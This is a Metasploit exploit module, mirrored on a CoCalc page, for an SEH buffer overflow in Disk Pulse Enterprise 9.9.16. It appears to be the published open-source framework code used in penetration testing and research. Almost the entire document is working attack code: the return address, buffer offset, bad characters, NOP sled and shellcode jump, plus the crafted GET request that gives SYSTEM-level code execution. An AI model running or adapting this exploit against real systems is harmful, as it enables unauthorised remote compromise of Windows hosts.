Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/disk_pulse_enterprise_get.rb
19850 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
17
'Description' => %q{
18
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
19
9.9.16. If a malicious user sends a crafted HTTP GET request
20
it is possible to execute a payload that would run under the Windows
21
NT AUTHORITY\SYSTEM account.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'Chance Johnson', # msf module - [email protected]
26
'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
27
],
28
'References' => [
29
[ 'EDB', '42560' ]
30
],
31
'DefaultOptions' => {
32
'EXITFUNC' => 'thread'
33
},
34
'Platform' => 'win',
35
'Payload' => {
36
'EncoderType' => "alpha_mixed",
37
'BadChars' => "\x00\x0a\x0d\x26"
38
},
39
'Targets' => [
40
[
41
'Disk Pulse Enterprise 9.9.16',
42
{
43
'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
44
'Offset' => 2492
45
}
46
]
47
],
48
'Privileged' => true,
49
'DisclosureDate' => '2017-08-25',
50
'DefaultTarget' => 0,
51
'Notes' => {
52
'Reliability' => UNKNOWN_RELIABILITY,
53
'Stability' => UNKNOWN_STABILITY,
54
'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
}
56
)
57
)
58
59
register_options([Opt::RPORT(80)])
60
end
61
62
def check
63
res = send_request_cgi(
64
'uri' => '/',
65
'method' => 'GET'
66
)
67
68
if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
69
return Exploit::CheckCode::Appears
70
end
71
72
return Exploit::CheckCode::Safe
73
end
74
75
def exploit
76
connect
77
78
print_status("Generating exploit...")
79
exp = payload.encoded
80
exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
81
exp << generate_seh_record(target.ret)
82
exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
83
exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
84
exp << 'B' * (5000 - exp.length) # padding
85
86
print_status("Sending exploit...")
87
88
send_request_cgi(
89
'uri' => '/../' + exp,
90
'method' => 'GET',
91
'host' => '4.2.2.2',
92
'connection' => 'keep-alive'
93
)
94
95
handler
96
disconnect
97
end
98
end
99
100